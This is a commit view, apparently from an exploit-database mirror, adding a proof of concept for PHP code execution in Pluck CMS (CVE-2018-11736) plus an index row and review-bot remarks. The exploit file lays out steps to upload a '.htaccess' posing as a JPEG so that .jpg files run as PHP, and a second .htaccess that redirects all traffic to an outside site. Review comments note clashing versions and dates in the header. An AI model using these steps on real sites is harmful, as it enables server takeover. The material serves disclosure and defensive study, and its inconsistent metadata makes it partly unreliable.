Commit 52e9863

author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents 603285f + 6fbba66 commit 52e9863

2 files changed

+23
-0
lines changed

exploits/php/webapps/52460.txt

Lines changed: 22 additions & 0 deletions
@@ -0,0 +1,22 @@
1+
# Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution
2+
# Date: 2024-10-26
3+
# Exploit Author: CodeSecLab
4+
# Vendor Homepage: https://github.com/pluck-cms/pluck
5+
# Software Link: https://github.com/pluck-cms/pluck
6+
# Version: 4.74-dev5
7+
# Tested on: Ubuntu Windows
8+
# CVE : CVE-2018-11736
9+
10+
PoC:
11+
1)
12+
1. Log in to the Pluck admin panel.\n
13+
2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n
14+
3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n
15+
4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension.
16+
17+
2)
18+
.htaccess content:
19+
RewriteEngine On
20+
RewriteRule .* http://www.baidu.com/ [R,L]
21+
22+
[Replace Your Domain Name]
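
Review bot: the header metadata is internally inconsistent: the title names Pluck 4.7.7-dev2 while the `# Version:` line says 4.74-dev5, and `# Tested on: Ubuntu Windows` does not say whether that is one environment or two. Reconcile the version to a single affected release or range and separate the tested platforms. Steps 1 to 3 also end in a literal `\n`, which looks like an unrendered escape and should be dropped. Section `2)` gives a second .htaccess body with no sentence saying what it is meant to show or how it relates to section `1)`, and the closing `[Replace Your Domain Name]` does not say which host it refers to; a one-line description for each would make the entry reviewable.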

files_exploits.csv

Lines changed: 1 addition & 0 deletions
@@ -28347,6 +28347,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2834728347
15577,exploits/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,webapps,php,,2010-11-19,2010-11-19,0,OSVDB-69455,,,,,
2834828348
37305,exploits/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",webapps,php,,2012-05-22,2015-06-19,1,OSVDB-39764;CVE-2007-6587,,,,,https://www.securityfocus.com/bid/53644/info
2834928349
28868,exploits/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,webapps,php,,2006-10-27,2013-10-11,1,,,,,,https://www.securityfocus.com/bid/20772/info
28350+
52460,exploits/php/webapps/52460.txt,"Pluck 4.7.7-dev2 - PHP Code Execution",2025-12-08,CodeSecLab,webapps,php,,2025-12-08,2025-12-08,0,CVE-2018-11736,,,,,
2835028351
6074,exploits/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Local File Inclusion",2008-07-14,BugReport.IR,webapps,php,,2008-07-13,2016-12-13,1,OSVDB-47012;CVE-2008-3194,,,,,
2835128352
32168,exploits/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",webapps,php,,2008-08-05,2016-12-13,1,CVE-2008-3574;OSVDB-47433;OSVDB-47432;OSVDB-47431;OSVDB-47430,,,,,https://www.securityfocus.com/bid/30542/info
2835228353
6300,exploits/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusions",2008-08-25,DSecRG,webapps,php,,2008-08-24,,1,OSVDB-47874;CVE-2008-3851;OSVDB-47778,,,,,
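
Review bot: in the added row 52460, `date_published` is 2025-12-08, while the header of exploits/php/webapps/52460.txt in this same commit gives `# Date: 2024-10-26`; confirm the CSV is meant to carry the publication date rather than the author's date. The description column repeats the title's 4.7.7-dev2, which conflicts with the file's `# Version: 4.74-dev5`, so whichever version is correct should be fixed in both places together.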
